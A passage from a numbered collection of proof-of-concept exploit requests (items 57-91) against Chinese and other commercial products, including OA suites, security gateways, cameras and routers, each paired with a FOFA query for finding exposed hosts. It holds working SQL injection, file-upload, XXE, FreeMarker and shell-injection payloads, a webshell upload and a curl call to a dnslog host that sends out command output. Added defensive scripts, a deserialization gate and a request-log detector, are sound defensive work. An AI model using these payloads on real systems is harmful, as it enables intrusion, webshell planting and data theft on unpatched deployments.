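      "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName": "cmd", "Arguments": "/c ping example.invalid"
      }
    }
  }
}"""
FASTJSON_PROBE = '{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://example.invalid"}}""}'
BENIGN = '{"storeID": 17, "name": "Main warehouse"}'
# A legitimate polymorphic payload for a hypothetical DTO of your own, passed with an allow-list.
TYPED_OK = '{"order": {"@type": "com.example.dto.Order", "id": 42}}'

if __name__ == "__main__":
    for label, raw in [("T+ RCE", TPLUS_RCE), ("fastjson probe", FASTJSON_PROBE), ("benign", BENIGN)]:
        print(f"{label:15s} {gate(raw)}")
    print(f"{'typed/allowed':15s} {gate(TYPED_OK, allowed_types={'com.example.dto.Order'})[0]}")
```

The gate is deliberately deny-by-default: the fix for these bugs is never a blocklist of known gadget classes (new ones keep appearing), but refusing type discriminators altogether on endpoints that do not need them, and an explicit allow-list where they are genuinely required.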
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
The sql parameter is base64 (here "select 1,user(),3"); the result is returned as an Excel export.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then fetch the file the command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A


64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
Time-based: a vulnerable host answers about 5 seconds late.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. Youkate (优卡特) Lian'aiyun one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function is reachable without a session; a 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42-43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
newdocId and filename set the name of the written file, dir sets the directory it is written to, and fileType sets the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
Time-based; the ";.js" suffix on the path gets the request past the authentication filter.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. Wanhu ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
The SID header is the base64 of the command to run (here "type C:\Windows\win.ini"); the __VIEWSTATE payload is omitted for length.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
The xmlValue parameter is parsed with external entities enabled; the entity below reads c:/windows/win.ini.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
The time parameter is passed to a shell unquoted, so a backtick substitution runs.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then fetch the file the command wrote:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. Newcapec (新开普) Zhangshang Xiaoyuan campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
The UnitCode field is rendered as a FreeMarker template, so freemarker.template.utility.Execute runs the command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


Then fetch the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
The target field chooses the directory the file is written to.
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
The report parameter is used as the output path without normalisation, so "../" escapes the report directory.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


Then fetch the uploaded file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. Uniview (宇视) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
The command to run is carried in the Cmd header; the JSON payload is omitted for length.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
The sql field is evaluated as a FreeMarker template before it reaches the database, so the same Execute trick as item 76 applies.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The accountId parameter is a path traversal into the Tomcat webapps directory; the exploit request below writes a Godzilla webshell (payload omitted for length).
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
The host parameter is interpolated into a ping command; a %0a newline terminates ping and starts a second command.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. DBAPPSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
The suffix parameter is appended to the stored file name unchecked, so "/../../../" relocates the upload to the web root.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


The uploaded file is then reachable at /jfhatuwe.php

88. DBAPPSecurity (安恒) MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
The type parameter reaches a shell; the decoded payload is echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


The written file is then reachable at /txzfsrur.php (the name used in the payload above)

89. Seeyon (致远) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
The ".js%70" spelling of ".jsp" gets the request past a filter that matches on the literal extension.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


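Items 62, 75, 79, 82, 86, 88 and 90 are one bug class (a request parameter reaches a shell) and items 76 and 84 another (a request field is rendered by FreeMarker). The script below is an added example, not code from the original post or from any of the products: it classifies logged requests against those endpoints by the payload shapes seen above, which is the rule set a defender would load into a WAF or run over proxy logs during the risk check this article is meant for. It assumes a log that keeps the request line and, for POSTs, the body and Content-Type; the sink table (which parameter each product hands to a shell) and the rule that a ping target must be an IP literal are assumptions to tune, and the sample records are constructed from the POCs on this page.

```python
"""Request-level detection for the command-injection and template-injection
POCs in items 62, 75, 76, 79, 82, 84, 86, 88 and 90 above.

Added example, not code from the original post. The sink table and the
"ping target must be an IP literal" rule are assumptions; SAMPLE_LOG is
constructed from the page's POCs plus one benign request.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# path -> parameters the listed product passes to a shell (assumed from the POCs)
SHELL_SINKS = {
    "/ipg/static/appr/lib/flexpaper/php/view.php": {"page"},   # item 62
    "/cgi-bin/admin.cgi": {"time"},                             # item 75
    "/goform/webRead/open/": {"path"},                          # item 79
    "/bhost/test_qrcode_b": {"z2"},                             # item 82
    "/cgi-bin/network_test.php": {"host"},                      # item 86
    "/webui/": {"type"},                                        # item 88
    "/php/ping.php": {"jsondata[ip]"},                          # item 90
}
# endpoints that evaluate a request field with FreeMarker (items 76 and 84)
TEMPLATE_SINKS = {
    "/service_transport/service.action",
    "/jeecg-boot/jmreport/queryFieldBySql",
}
# metacharacters as they look after URL decoding: ||, |, ;, backtick, >, newline, $(, ${IFS}
SHELL_META = re.compile(r"\|\||[|;`>\n]|\$\(|\$\{IFS\}")
FREEMARKER = re.compile(r"<#assign\b[^>]*\?new\(\)|freemarker\.template\.utility\.Execute")


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def classify(method: str, target: str, body: str = "", content_type: str = ""):
    """Return [(rule, detail), ...] for one logged request; an empty list means clean."""
    parts = urlsplit(target)
    params = list(parse_qsl(parts.query, keep_blank_values=True))
    if method == "POST" and "application/x-www-form-urlencoded" in content_type:
        params += parse_qsl(body, keep_blank_values=True)  # decodes %0a, %5B etc.

    findings = []
    for name, value in params:
        if name not in SHELL_SINKS.get(parts.path, ()):
            continue
        if SHELL_META.search(value):
            findings.append(("shell-metachar", f"{name}={value!r}"))
        elif parts.path == "/php/ping.php" and not _is_ip(value):
            # item 90 carries no metacharacters at all: the value itself is the command
            findings.append(("non-ip-ping-target", f"{name}={value!r}"))
    if parts.path in TEMPLATE_SINKS and FREEMARKER.search(body):
        findings.append(("freemarker-execute", parts.path))
    return findings


def scan(records):
    """Run classify over (method, target, body, content_type) tuples and keep the hits."""
    hits = []
    for index, record in enumerate(records):
        findings = classify(*record)
        if findings:
            hits.append((index, findings))
    return hits


FORM = "application/x-www-form-urlencoded"
SAMPLE_LOG = [  # constructed from the POCs above, last entry is benign traffic
    ("GET", "/goform/webRead/open/?path=|id", "", ""),
    ("GET", "/cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt`", "", ""),
    ("POST", "/cgi-bin/network_test.php", "host=%0acat${IFS}/etc/passwd%0a&command=ping", FORM),
    ("POST", "/php/ping.php", "jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig", FORM),
    ("POST", "/jeecg-boot/jmreport/queryFieldBySql",
     '{"sql": "<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>${ex(\\"id\\")}", "type": "0"}',
     "application/json"),
    ("POST", "/php/ping.php", "jsondata%5Btype%5D=1&jsondata%5Bip%5D=10.0.0.1", FORM),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, SAMPLE_LOG[index][1], findings)
```

The metacharacter rule is deliberately scoped to the listed sink parameters rather than applied to every request, otherwise ordinary query strings that legitimately contain ";" or ">" would flood the alert queue; item 90 is the reminder that a sink which runs the value directly needs a positive shape check (IP literal only) instead of a blacklist.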
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
The "..;/" segment gets the request past the authentication filter on /center/api/task/ while the container dispatches it to /center/api/orgManage/...; fileName is then a plain path traversal.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
